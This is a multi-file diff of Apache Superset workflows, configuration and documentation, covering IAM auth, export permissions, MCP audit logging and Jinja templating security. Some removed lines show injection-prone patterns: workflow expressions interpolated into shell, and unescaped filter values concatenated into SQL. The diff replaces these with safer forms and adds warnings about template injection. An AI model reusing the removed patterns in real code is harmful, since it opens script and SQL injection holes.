- RELEASE="${{ github.event.inputs.release }}"
+ RELEASE="${INPUT_RELEASE}"
fi
supersetbot release-label $RELEASE
.github/workflows/tech-debt.yml (8 changes)
@@ -19,10 +19,12 @@ jobs:
id: check
shell: bash
run: |
- if [ -n "${{ (secrets.GSHEET_KEY != '' ) || '' }}" ]; then
+ if [ -n "${GSHEET_KEY}" ]; then
echo "has-secrets=1" >> "$GITHUB_OUTPUT"
fi

+ env:
+   GSHEET_KEY: ${{ (secrets.GSHEET_KEY != '' ) || '' }}
process-and-upload:
needs: config
if: needs.config.outputs.has-secrets
@@ -30,10 +32,10 @@ jobs:
name: Generate Reports
steps:
- name: Checkout Repository
- uses: actions/checkout@v6
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6

- name: Set up Node.js
- uses: actions/setup-node@v6
+ uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
with:
node-version-file: './superset-frontend/.nvmrc'
.gitignore (2 changes)
@@ -62,6 +62,7 @@ rat-results.txt
superset/app/
superset-websocket/config.json
.direnv
+ *.log

# Node.js, webpack artifacts, storybook
*.entry.js
@@ -133,6 +134,7 @@ CLAUDE.local.md
PROJECT.md
.aider*
.claude_rc*
+ .claude/settings.local.json
.env.local
oxc-custom-build/
*.code-workspace
@@ -458,7 +458,7 @@ cd ../
sed -i '' "s/version_string = .*/version_string = \"$SUPERSET_VERSION\"/" setup.py

# build the python distribution
- python setup.py sdist
+ python -m build
```

Publish to PyPI
@@ -287,6 +287,11 @@ categories:
url: https://www.gfk.com/home
contributors: ["@mherr"]

+ - name: Hifadih Business & Technology
+   url: https://hifadih.net/en
+   logo: hifadih.png
+   contributors: ["@saintLaurent00"]

# Logo approved by @anmol-hpe on behalf of HPE
- name: HPE
url: https://www.hpe.com/in/en/home.html
UPDATING.md (26 changes)
@@ -24,6 +24,28 @@ assists people when migrating to a new version.

## Next

### Granular Export Controls

A new feature flag `GRANULAR_EXPORT_CONTROLS` introduces three fine-grained permissions that replace the legacy `can_csv` permission:

| Permission | Controls |
|---|---|
| `can_export_data` | CSV, Excel, JSON exports |
| `can_export_image` | Screenshot/PDF exports |
| `can_copy_clipboard` | Copy-to-clipboard operations |

When the feature flag is enabled, these permissions are enforced on both the frontend (disabled buttons with tooltips) and the backend (403 responses from API endpoints). When disabled, the legacy `can_csv` behavior is preserved.

**Migration behavior:** All three new permissions are granted to every role that currently has `can_csv`, preserving existing access. Admins can then selectively revoke individual export permissions from specific roles as needed.
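For operators, turning this on is a one-line config change; a minimal sketch, assuming the standard `FEATURE_FLAGS` dict in `superset_config.py` (per-role adjustments then happen in the Security UI or API):

```python
# superset_config.py -- minimal sketch; the migration grants can_export_data,
# can_export_image, and can_copy_clipboard to every role that had can_csv.
FEATURE_FLAGS = {
    "GRANULAR_EXPORT_CONTROLS": True,
}
```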
### Deck.gl MapBox viewport and opacity controls are functional

The Deck.gl MapBox chart's **Opacity**, **Default longitude**, **Default latitude**, and **Zoom** controls were previously non-functional: changing them had no effect on the rendered map. These controls are now wired up correctly.

**Behavior change for existing charts:** Previously, the viewport controls had hard-coded default values (`-122.405293`, `37.772123`, zoom `11` -- San Francisco) that were stored in each chart's `form_data` but never applied. The map always used `fitBounds` to center on the data. With this fix, those stored values are now respected, which means existing MapBox charts may open centered on the old default coordinates instead of fitting to data bounds.

**To restore fit-to-data behavior:** Open the chart in Explore, clear the **Default longitude**, **Default latitude**, and **Zoom** fields in the Viewport section, and re-save the chart.

### ClickHouse minimum driver version bump

The minimum required version of `clickhouse-connect` has been raised to `>=0.13.0`. If you are using the ClickHouse connector, please upgrade your `clickhouse-connect` package. The `_mutate_label` workaround that appended hash suffixes to column aliases has also been removed, as it is no longer needed with modern versions of the driver.
@@ -300,13 +322,13 @@ Note: Pillow is now a required dependency (previously optional) to support image
There's a migration added that can potentially affect a significant number of existing charts.
- [32317](https://github.com/apache/superset/pull/32317) The horizontal filter bar feature is now out of testing/beta development and its feature flag `HORIZONTAL_FILTER_BAR` has been removed.
- [31590](https://github.com/apache/superset/pull/31590) Marks the beginning of intricate work around supporting dynamic theming, and breaks support for [THEME_OVERRIDES](https://github.com/apache/superset/blob/732de4ac7fae88e29b7f123b6cbb2d7cd411b0e4/superset/config.py#L671) in favor of a new theming system based on AntD V5. Likely this will be in disrepair until settling over the 5.x lifecycle.
- - [32432](https://github.com/apache/superset/pull/31260) Moves the List Roles FAB view to the frontend and requires `FAB_ADD_SECURITY_API` to be enabled in the configuration and `superset init` to be executed.
+ - [32432](https://github.com/apache/superset/pull/32432) Moves the List Roles FAB view to the frontend and requires `FAB_ADD_SECURITY_API` to be enabled in the configuration and `superset init` to be executed.
- [34319](https://github.com/apache/superset/pull/34319) Drill to Detail and Drill By are now supported in Embedded mode, and also with the `DASHBOARD_RBAC` feature flag. If you don't want to expose these features in Embedded / `DASHBOARD_RBAC`, make sure the roles used for Embedded / `DASHBOARD_RBAC` don't have the required permissions to perform D2D actions.

## 5.0.0

- [31976](https://github.com/apache/superset/pull/31976) Removed the `DISABLE_LEGACY_DATASOURCE_EDITOR` feature flag. The previous value of the feature flag was `True` and now the feature is permanently removed.
- - [31959](https://github.com/apache/superset/pull/32000) Removes CSV_UPLOAD_MAX_SIZE config, use your web server to control file upload size.
+ - [32000](https://github.com/apache/superset/pull/32000) Removes CSV_UPLOAD_MAX_SIZE config, use your web server to control file upload size.
- [31959](https://github.com/apache/superset/pull/31959) Removes the following endpoints from data uploads: `/api/v1/database/<id>/<file type>_upload` and `/api/v1/database/<file type>_metadata`, in favour of a new one (details on the PR), and simplifies permissions.
- [31844](https://github.com/apache/superset/pull/31844) The `ALERT_REPORTS_EXECUTE_AS` and `THUMBNAILS_EXECUTE_AS` config parameters have been renamed to `ALERT_REPORTS_EXECUTORS` and `THUMBNAILS_EXECUTORS` respectively. A new config flag `CACHE_WARMUP_EXECUTORS` has also been introduced to be able to control which user is used to execute cache warmup tasks. Finally, the config flag `THUMBNAILS_SELENIUM_USER` has been removed. To use a fixed executor for async tasks, use the new `FixedExecutor` class. See the config and docs for more info on setting up different executor profiles.
- [31894](https://github.com/apache/superset/pull/31894) Domain sharding is deprecated in favor of HTTP/2. The `SUPERSET_WEBSERVER_DOMAINS` configuration will be removed in the next major version (6.0).
||||
@@ -115,6 +115,10 @@ services:
DATABASE_HOST: db-light
DATABASE_DB: superset_light
POSTGRES_DB: superset_light
+ EXAMPLES_HOST: db-light
+ EXAMPLES_DB: superset_light
+ EXAMPLES_USER: superset
+ EXAMPLES_PASSWORD: superset
SUPERSET_CONFIG_PATH: /app/docker/pythonpath_dev/superset_config_docker_light.py
GITHUB_HEAD_REF: ${GITHUB_HEAD_REF:-}
GITHUB_SHA: ${GITHUB_SHA:-}
@@ -137,6 +141,10 @@ services:
DATABASE_HOST: db-light
DATABASE_DB: superset_light
POSTGRES_DB: superset_light
+ EXAMPLES_HOST: db-light
+ EXAMPLES_DB: superset_light
+ EXAMPLES_USER: superset
+ EXAMPLES_PASSWORD: superset
SUPERSET_CONFIG_PATH: /app/docker/pythonpath_dev/superset_config_docker_light.py
healthcheck:
disable: true
@@ -157,6 +165,7 @@ services:
BUILD_SUPERSET_FRONTEND_IN_DOCKER: true
NPM_RUN_PRUNE: false
SCARF_ANALYTICS: "${SCARF_ANALYTICS:-}"
+ DISABLE_TS_CHECKER: "${DISABLE_TS_CHECKER:-true}"
# configuring the dev-server to use the host.docker.internal to connect to the backend
superset: "http://superset-light:8088"
# Webpack dev server must bind to 0.0.0.0 to be accessible from outside the container
@@ -80,7 +80,7 @@ case "${1}" in
;;
app)
echo "Starting web app (using development server)..."
- flask run -p $PORT --reload --debugger --without-threads --host=0.0.0.0 --exclude-patterns "*/node_modules/*:*/.venv/*:*/build/*:*/__pycache__/*"
+ flask run -p $PORT --reload --debugger --host=0.0.0.0 --exclude-patterns "*/node_modules/*:*/.venv/*:*/build/*:*/__pycache__/*:*/superset-frontend/*"
;;
app-gunicorn)
echo "Starting web app..."
docs/admin_docs/configuration/aws-iam.mdx (new file, 162 lines)
@@ -0,0 +1,162 @@
{/*
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at

  http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
*/}

---
title: AWS IAM Authentication
sidebar_label: AWS IAM Authentication
sidebar_position: 15
---

# AWS IAM Authentication for AWS Databases

Superset supports IAM-based authentication for **Amazon Aurora** (PostgreSQL and MySQL) and **Amazon Redshift**. IAM auth eliminates the need for database passwords -- Superset generates a short-lived auth token using temporary AWS credentials instead.

Cross-account IAM role assumption via STS `AssumeRole` is supported, allowing a Superset deployment in one AWS account to connect to databases in a different account.

## Prerequisites

- Enable the `AWS_DATABASE_IAM_AUTH` feature flag in `superset_config.py`. IAM authentication is gated behind this flag; if it is disabled, connections using `aws_iam` fail with *"AWS IAM database authentication is not enabled."*

  ```python
  FEATURE_FLAGS = {
      "AWS_DATABASE_IAM_AUTH": True,
  }
  ```

- `boto3` must be installed in your Superset environment:

  ```bash
  pip install boto3
  ```

- The Superset server's IAM role (or static credentials) must have permission to call `sts:AssumeRole` (for cross-account) or the same-account permissions for the target service:
  - **Aurora (RDS)**: `rds-db:connect`
  - **Redshift provisioned**: `redshift:GetClusterCredentials`
  - **Redshift Serverless**: `redshift-serverless:GetCredentials` and `redshift-serverless:GetWorkgroup`
- SSL must be enabled on the Aurora / Redshift endpoint (required for IAM token auth).

## Configuration

IAM authentication is configured via the **encrypted_extra** field of the database connection. Access this field in the **Advanced** → **Security** section of the database connection form, under **Secure Extra**.

### Aurora PostgreSQL or Aurora MySQL

```json
{
  "aws_iam": {
    "enabled": true,
    "role_arn": "arn:aws:iam::222222222222:role/SupersetDatabaseAccess",
    "external_id": "superset-prod-12345",
    "region": "us-east-1",
    "db_username": "superset_iam_user",
    "session_duration": 3600
  }
}
```

| Field | Required | Description |
|-------|----------|-------------|
| `enabled` | Yes | Set to `true` to activate IAM auth |
| `role_arn` | No | ARN of the cross-account IAM role to assume via STS. Omit for same-account auth |
| `external_id` | No | External ID for the STS `AssumeRole` call, if required by the target role's trust policy |
| `region` | Yes | AWS region of the database cluster |
| `db_username` | Yes | The database username associated with the IAM identity |
| `session_duration` | No | STS session duration in seconds (default: `3600`) |

### Redshift (Serverless)

```json
{
  "aws_iam": {
    "enabled": true,
    "role_arn": "arn:aws:iam::222222222222:role/SupersetRedshiftAccess",
    "region": "us-east-1",
    "workgroup_name": "my-workgroup",
    "db_name": "dev"
  }
}
```

### Redshift (Provisioned Cluster)

```json
{
  "aws_iam": {
    "enabled": true,
    "role_arn": "arn:aws:iam::222222222222:role/SupersetRedshiftAccess",
    "region": "us-east-1",
    "cluster_identifier": "my-cluster",
    "db_username": "superset_iam_user",
    "db_name": "dev"
  }
}
```

## Cross-Account IAM Setup

To connect to a database in Account B from a Superset deployment in Account A:

**1. In Account B -- create a database-access role:**

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["rds-db:connect"],
      "Resource": "arn:aws:rds-db:us-east-1:222222222222:dbuser/db-XXXXXXXXXXXX/superset_iam_user"
    }
  ]
}
```

**Trust policy** (allows Account A's Superset role to assume it):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/SupersetInstanceRole"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "superset-prod-12345"
        }
      }
    }
  ]
}
```

**2. In Account A -- grant Superset's role permission to assume the Account B role:**

```json
{
  "Effect": "Allow",
  "Action": "sts:AssumeRole",
  "Resource": "arn:aws:iam::222222222222:role/SupersetDatabaseAccess"
}
```

**3. Configure the database connection in Superset** using the `role_arn` and `external_id` from the trust policy (as shown in the configuration example above).
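The connection can also be created programmatically. A minimal sketch, assuming an authenticated session and that your Superset version accepts `encrypted_extra` as a JSON string on `POST /api/v1/database/` (field names vary between versions, so verify against your instance's OpenAPI spec; the host is hypothetical):

```python
import json
import requests

SUPERSET = "https://superset.example.com"  # hypothetical host
session = requests.Session()
session.headers["Authorization"] = "Bearer YOUR_ACCESS_TOKEN"

payload = {
    "database_name": "aurora-analytics",
    "sqlalchemy_uri": "postgresql+psycopg2://@my-cluster.cluster-xyz.us-east-1.rds.amazonaws.com:5432/analytics",
    # Same structure as the Secure Extra examples above
    "encrypted_extra": json.dumps({
        "aws_iam": {
            "enabled": True,
            "role_arn": "arn:aws:iam::222222222222:role/SupersetDatabaseAccess",
            "external_id": "superset-prod-12345",
            "region": "us-east-1",
            "db_username": "superset_iam_user",
        }
    }),
}
resp = session.post(f"{SUPERSET}/api/v1/database/", json=payload)
resp.raise_for_status()
```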
## Credential Caching

STS credentials are cached in memory keyed by `(role_arn, region, external_id)` with a 10-minute TTL. This reduces the number of STS API calls when multiple queries are executed with the same connection. Tokens are refreshed automatically before expiry.
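To illustrate the pattern (a minimal sketch, not Superset's actual implementation), here is TTL-based caching around `boto3`'s `sts.assume_role` call:

```python
import time
import boto3

_CACHE: dict[tuple[str, str, str], tuple[float, dict]] = {}
_TTL_SECONDS = 600  # 10 minutes, matching the behavior described above

def get_sts_credentials(role_arn: str, region: str, external_id: str) -> dict:
    """Return cached temporary credentials, calling AssumeRole only when the
    cache entry is missing or older than the TTL."""
    key = (role_arn, region, external_id)
    now = time.monotonic()
    cached = _CACHE.get(key)
    if cached and now - cached[0] < _TTL_SECONDS:
        return cached[1]
    sts = boto3.client("sts", region_name=region)
    resp = sts.assume_role(
        RoleArn=role_arn,
        RoleSessionName="superset-db-auth",
        ExternalId=external_id,
        DurationSeconds=3600,
    )
    creds = resp["Credentials"]
    _CACHE[key] = (now, creds)
    return creds
```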
@@ -109,6 +109,14 @@ SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'

You can generate a strong secure key with `openssl rand -base64 42`.

Alternatively, you can set the secret key using the `SUPERSET_SECRET_KEY` environment variable.

On a Unix-based system, such as Linux or macOS, you can do so by running the following command in your terminal:

```bash
export SUPERSET_SECRET_KEY=$(openssl rand -base64 42)
```
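If `openssl` is not available, Python's standard library generates an equally strong key; a sketch using the stdlib `secrets` module:

```python
# Generate a URL-safe random key with roughly the same entropy as
# `openssl rand -base64 42` (42 random bytes).
import secrets

print(secrets.token_urlsafe(42))
```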
:::caution Use a strong secret key
This key will be used for securely signing session cookies and encrypting sensitive information stored in Superset's application metadata database.
Your deployment must use a complex, unique key.
@@ -10,6 +10,10 @@ version: 1
The superset cli allows you to import and export datasources from and to YAML. Datasources include
databases. The data is expected to be organized in the following hierarchy:

:::info
Superset's ZIP-based import/export also covers **dashboards**, **charts**, and **saved queries**, available through the UI and REST API. The [Dashboard Import Overwrite Behavior](#dashboard-import-overwrite-behavior) and [UUIDs in API Responses](#uuids-in-api-responses) sections below document the behavior shared across all asset types.
:::

```text
├──databases
|  ├──database_1
@@ -75,6 +79,29 @@ The optional username flag **-u** sets the user used for the datasource import.
superset import_datasources -p <path / filename> -u 'admin'
```

## Dashboard Import Overwrite Behavior

When importing a dashboard ZIP with the **overwrite** option enabled, any existing charts that are part of the dashboard are **replaced** rather than duplicated. This applies to:

- Charts whose UUID matches a chart already present in the target instance
- The full chart configuration (query, visualization type, columns, metrics), which is replaced by the imported version

If you import without the overwrite flag, existing charts with conflicting UUIDs are left unchanged and the import skips those objects. Use overwrite when you want to push a fully updated dashboard (including chart definitions) from a development or staging environment to production, as sketched below.
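A minimal sketch of that push via the REST API, assuming an authenticated session and the multipart `formData` / `overwrite` fields accepted by `POST /api/v1/dashboard/import/` (check your instance's OpenAPI spec if the field names differ; the host is hypothetical):

```python
import requests

SUPERSET = "https://superset.example.com"  # hypothetical host
session = requests.Session()
session.headers["Authorization"] = "Bearer YOUR_ACCESS_TOKEN"

with open("dashboard_export.zip", "rb") as f:
    resp = session.post(
        f"{SUPERSET}/api/v1/dashboard/import/",
        files={"formData": ("dashboard_export.zip", f, "application/zip")},
        # Replace charts/datasets whose UUIDs already exist in the target
        data={"overwrite": "true"},
    )
resp.raise_for_status()
```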
## UUIDs in API Responses

The REST API POST endpoints for **datasets**, **charts**, and **dashboards** include the auto-generated `uuid` field in the response body:

```json
{
  "id": 42,
  "uuid": "b8a8d5c3-1234-4abc-8def-0123456789ab",
  ...
}
```

UUIDs remain stable across import/export cycles and can be used for cross-environment workflows -- for example, recording a UUID when creating a chart in development and using it to identify the matching chart after importing into production.
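A sketch of the first half of that workflow (the payload is illustrative; it assumes the standard chart endpoint listed later in this document and a hypothetical host):

```python
import requests

DEV = "https://superset-dev.example.com"  # hypothetical host
session = requests.Session()
session.headers["Authorization"] = "Bearer DEV_TOKEN"

# 1. Create a chart in development; the response includes the stable uuid.
resp = session.post(f"{DEV}/api/v1/chart/", json={
    "slice_name": "Revenue by region",  # illustrative payload
    "datasource_id": 7,
    "datasource_type": "table",
    "viz_type": "table",
    "params": "{}",
})
resp.raise_for_status()
chart_uuid = resp.json()["uuid"]

# 2. Record chart_uuid in your deployment tooling; after exporting this chart
#    and importing it into production, the imported chart carries the same
#    uuid, so it can be matched across environments.
print(chart_uuid)
```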
## Legacy Importing Datasources

### From older versions of Superset to current version
@@ -1,7 +1,7 @@
---
title: MCP Server Deployment & Authentication
hide_title: true
- sidebar_position: 9
+ sidebar_position: 14
version: 1
---
@@ -30,6 +30,10 @@ Superset includes a built-in [Model Context Protocol (MCP)](https://modelcontext

This guide covers how to run, secure, and deploy the MCP server.

:::tip Looking for user docs?
See **[Using AI with Superset](/user-docs/using-superset/using-ai-with-superset)** for a guide on what AI can do with Superset and how to connect your AI client.
:::

```mermaid
flowchart LR
A["AI Client<br/>(Claude, ChatGPT, etc.)"] -- "MCP protocol<br/>(HTTP + JSON-RPC)" --> B["MCP Server<br/>(:5008/mcp)"]
@@ -497,6 +501,7 @@ All MCP settings go in `superset_config.py`. Defaults are defined in `superset/m
| `MCP_SERVICE_URL` | `None` | Public base URL for MCP-generated links (set this when behind a reverse proxy) |
| `MCP_DEBUG` | `False` | Enable debug logging |
| `MCP_DEV_USERNAME` | -- | Superset username for development mode (no auth) |
| `MCP_PARSE_REQUEST_ENABLED` | `True` | Pre-parse MCP tool inputs from JSON strings into objects. Set to `False` for clients (Claude Desktop, LangChain) that do not double-serialize arguments -- this produces cleaner tool schemas for those clients |

### Authentication

@@ -660,6 +665,32 @@ MCP_CSRF_CONFIG = {

---

## Audit Events

All MCP tool calls are logged to Superset's event logger, the same system used by the web UI (viewable at **Settings → Action Log**). Each event captures:

- **Action**: `mcp.<tool_name>.<phase>` (e.g., `mcp.list_databases.query`)
- **User**: the resolved Superset username from the JWT or dev config
- **Timestamp**: when the operation ran

This means MCP activity is auditable alongside normal user activity. No additional configuration is required -- logging is on by default whenever the event logger is enabled in your Superset deployment.

## Tool Pagination

MCP list tools (`list_datasets`, `list_charts`, `list_dashboards`, `list_databases`) use **offset pagination** via `page` (1-based) and `page_size` parameters. Responses include `page`, `page_size`, `total_count`, `total_pages`, `has_previous`, and `has_next`. To iterate through all results:

```python
# Example: fetch all charts across pages
all_charts = []
page = 1
while True:
    result = mcp.list_charts(page=page, page_size=50)
    all_charts.extend(result["charts"])
    if not result.get("has_next"):
        break
    page += 1
```
## Security Best Practices

- **Use TLS** for all production MCP endpoints -- place the server behind a reverse proxy with HTTPS
@@ -668,12 +699,13 @@ MCP_CSRF_CONFIG = {
- **Secrets management** -- Store `MCP_JWT_SECRET`, database credentials, and API keys in environment variables or a secrets manager, never in config files committed to version control
- **Scoped tokens** -- Use `MCP_REQUIRED_SCOPES` to limit what operations a token can perform
- **Network isolation** -- In Kubernetes, restrict MCP pod network policies to only allow traffic from your AI client endpoints
- - Review the **[Security documentation](./security)** for additional extension security guidance
+ - Review the **[Security documentation](/developer-docs/extensions/security)** for additional extension security guidance

---

## Next Steps

- - **[MCP Integration](./mcp)** -- Build custom MCP tools and prompts via Superset extensions
- - **[Security](./security)** -- Security best practices for extensions
- - **[Deployment](./deployment)** -- Package and deploy Superset extensions
+ - **[Using AI with Superset](/user-docs/using-superset/using-ai-with-superset)** -- What AI can do with Superset and how to get started
+ - **[MCP Integration](/developer-docs/extensions/mcp)** -- Build custom MCP tools and prompts via Superset extensions
+ - **[Security](/developer-docs/extensions/security)** -- Security best practices for extensions
+ - **[Deployment](/developer-docs/extensions/deployment)** -- Package and deploy Superset extensions
@@ -22,6 +22,15 @@ While powerful, this feature executes template code on the server. Within the Su

If you grant these permissions to untrusted users, this feature can be exploited as a **Server-Side Template Injection (SSTI)** vulnerability. Do not enable `ENABLE_TEMPLATE_PROCESSING` unless you fully understand and accept the associated security risks.

Additionally:

- The `url_param()` macro allows URL parameters to influence the rendered SQL. Always validate or restrict `url_param()` values in your templates rather than interpolating them directly.
- `filter.get('val')` returns raw filter values without escaping. Use the safe helpers described below (`|where_in`, `| replace("'", "''")`) rather than concatenating values directly into SQL strings.

:::

:::tip
`ENABLE_TEMPLATE_PROCESSING` defaults to `False`. Only enable it if your deployment requires Jinja templates and all users with dataset/chart edit access are administrators or fully trusted internal users.
:::
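For reference, the flag lives in `FEATURE_FLAGS`; a minimal `superset_config.py` sketch:

```python
# superset_config.py -- only enable when every user with dataset/chart edit
# access is fully trusted, per the warning above.
FEATURE_FLAGS = {
    "ENABLE_TEMPLATE_PROCESSING": True,
}
```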
When templating is enabled, python code can be embedded in virtual datasets and
@@ -324,6 +333,16 @@ cache hit in the future and Superset can retrieve cached data.
The `{{ url_param('custom_variable') }}` macro lets you define arbitrary URL
parameters and reference them in your SQL code.

:::warning
Always treat `url_param()` values as untrusted input. Escaping behaviour varies by context and configuration, so do not rely on it. Restrict values to an explicit allowlist before using them in SQL:

```sql
{% set cc = url_param('countrycode') %}
{% if cc not in ('US', 'ES', 'FR') %}{% set cc = 'US' %}{% endif %}
WHERE country_code = '{{ cc }}'
```
:::

Here's a concrete example:

- You write the following query in SQL Lab:
@@ -398,6 +417,16 @@ This is useful if:
- You want to handle generating custom SQL conditions for a filter
- You want to have the ability to filter inside the main query for speed purposes

:::warning
`filter.get('val')` returns the raw filter value without escaping. For multi-value filters, use the `|where_in` Jinja filter, which handles quoting safely. For single-value operators like `LIKE`, escape single quotes before interpolating:

```sql
{%- if filter.get('op') == 'LIKE' -%}
  AND full_name LIKE '{{ filter.get('val') | replace("'", "''") }}'
{%- endif -%}
```
:::

Here's a concrete example:

```sql
@@ -424,7 +453,7 @@ Here's a concrete example:

{%- if filter.get('op') == 'LIKE' -%}
  AND
- full_name LIKE {{ "'" + filter.get('val') + "'" }}
+ full_name LIKE '{{ filter.get('val') | replace("'", "''") }}'
{%- endif -%}

{%- endfor -%}
@@ -24,6 +24,14 @@ A table with the permissions for these roles can be found at [/RESOURCES/STANDAR
Admins have all possible rights, including granting or revoking rights from other
users and altering other people's slices and dashboards.

> #### Threat Model and Privilege Boundaries: The Admin Role
>
> Apache Superset is built with a granular permission model where users assigned the Admin role are considered fully trusted. Admins possess complete control over the application's configuration, UI rendering, and access controls.
>
> Consequently, actions performed by an Admin that alter the application's behavior or presentation -- such as injecting custom CSS, modifying Jinja templates, or altering security flags -- are intended administrative capabilities by design.
>
> In accordance with MITRE CNA Rule 4.1, a vulnerability must represent a violation of an explicit security policy. Because the Admin role is defined as a trusted operational boundary, actions executed with Admin privileges do not cross a security perimeter. Therefore, exploit vectors that strictly require Admin access are not classified as security vulnerabilities and are ineligible for CVE assignment.

### Alpha

Alpha users have access to all data sources, but they cannot grant or revoke access
@@ -47,10 +47,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the CSRF token](./api/get-the-csrf-token) | `/api/v1/security/csrf_token/` |
|
||||
| `POST` | [Get a guest token](./api/get-a-guest-token) | `/api/v1/security/guest_token/` |
|
||||
| `POST` | [Create security login](./api/create-security-login) | `/api/v1/security/login` |
|
||||
| `POST` | [Create security refresh](./api/create-security-refresh) | `/api/v1/security/refresh` |
|
||||
| `GET` | [Get the CSRF token](/developer-docs/api/get-the-csrf-token) | `/api/v1/security/csrf_token/` |
|
||||
| `POST` | [Get a guest token](/developer-docs/api/get-a-guest-token) | `/api/v1/security/guest_token/` |
|
||||
| `POST` | [Create security login](/developer-docs/api/create-security-login) | `/api/v1/security/login` |
|
||||
| `POST` | [Create security refresh](/developer-docs/api/create-security-refresh) | `/api/v1/security/refresh` |
|
||||
|
||||
---
|
||||
|
||||
@@ -63,32 +63,32 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete dashboards](./api/bulk-delete-dashboards) | `/api/v1/dashboard/` |
|
||||
| `GET` | [Get a list of dashboards](./api/get-a-list-of-dashboards) | `/api/v1/dashboard/` |
|
||||
| `POST` | [Create a new dashboard](./api/create-a-new-dashboard) | `/api/v1/dashboard/` |
|
||||
| `GET` | [Get metadata information about this API resource (dashboard--info)](./api/get-metadata-information-about-this-api-resource-dashboard-info) | `/api/v1/dashboard/_info` |
|
||||
| `GET` | [Get a dashboard detail information](./api/get-a-dashboard-detail-information) | `/api/v1/dashboard/{id_or_slug}` |
|
||||
| `GET` | [Get a dashboard's chart definitions.](./api/get-a-dashboard-s-chart-definitions) | `/api/v1/dashboard/{id_or_slug}/charts` |
|
||||
| `POST` | [Create a copy of an existing dashboard](./api/create-a-copy-of-an-existing-dashboard) | `/api/v1/dashboard/{id_or_slug}/copy/` |
|
||||
| `GET` | [Get dashboard's datasets](./api/get-dashboard-s-datasets) | `/api/v1/dashboard/{id_or_slug}/datasets` |
|
||||
| `DELETE` | [Delete a dashboard's embedded configuration](./api/delete-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get the dashboard's embedded configuration](./api/get-the-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `POST` | [Set a dashboard's embedded configuration](./api/set-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `PUT` | [Update dashboard by id_or_slug embedded](./api/update-dashboard-by-id-or-slug-embedded) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get dashboard's tabs](./api/get-dashboard-s-tabs) | `/api/v1/dashboard/{id_or_slug}/tabs` |
|
||||
| `DELETE` | [Delete a dashboard](./api/delete-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `PUT` | [Update a dashboard](./api/update-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `POST` | [Compute and cache a screenshot (dashboard-pk-cache-dashboard-screenshot)](./api/compute-and-cache-a-screenshot-dashboard-pk-cache-dashboard-screenshot) | `/api/v1/dashboard/{pk}/cache_dashboard_screenshot/` |
|
||||
| `PUT` | [Update colors configuration for a dashboard.](./api/update-colors-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/colors` |
|
||||
| `DELETE` | [Remove the dashboard from the user favorite list](./api/remove-the-dashboard-from-the-user-favorite-list) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `POST` | [Mark the dashboard as favorite for the current user](./api/mark-the-dashboard-as-favorite-for-the-current-user) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `PUT` | [Update native filters configuration for a dashboard.](./api/update-native-filters-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/filters` |
|
||||
| `GET` | [Get a computed screenshot from cache (dashboard-pk-screenshot-digest)](./api/get-a-computed-screenshot-from-cache-dashboard-pk-screenshot-digest) | `/api/v1/dashboard/{pk}/screenshot/{digest}/` |
|
||||
| `GET` | [Get dashboard's thumbnail](./api/get-dashboard-s-thumbnail) | `/api/v1/dashboard/{pk}/thumbnail/{digest}/` |
|
||||
| `GET` | [Download multiple dashboards as YAML files](./api/download-multiple-dashboards-as-yaml-files) | `/api/v1/dashboard/export/` |
|
||||
| `GET` | [Check favorited dashboards for current user](./api/check-favorited-dashboards-for-current-user) | `/api/v1/dashboard/favorite_status/` |
|
||||
| `POST` | [Import dashboard(s) with associated charts/datasets/databases](./api/import-dashboard-s-with-associated-charts-datasets-databases) | `/api/v1/dashboard/import/` |
|
||||
| `GET` | [Get related fields data (dashboard-related-column-name)](./api/get-related-fields-data-dashboard-related-column-name) | `/api/v1/dashboard/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete dashboards](/developer-docs/api/bulk-delete-dashboards) | `/api/v1/dashboard/` |
| `GET` | [Get a list of dashboards](/developer-docs/api/get-a-list-of-dashboards) | `/api/v1/dashboard/` |
| `POST` | [Create a new dashboard](/developer-docs/api/create-a-new-dashboard) | `/api/v1/dashboard/` |
| `GET` | [Get metadata information about this API resource (dashboard--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-dashboard-info) | `/api/v1/dashboard/_info` |
| `GET` | [Get a dashboard detail information](/developer-docs/api/get-a-dashboard-detail-information) | `/api/v1/dashboard/{id_or_slug}` |
| `GET` | [Get a dashboard's chart definitions.](/developer-docs/api/get-a-dashboard-s-chart-definitions) | `/api/v1/dashboard/{id_or_slug}/charts` |
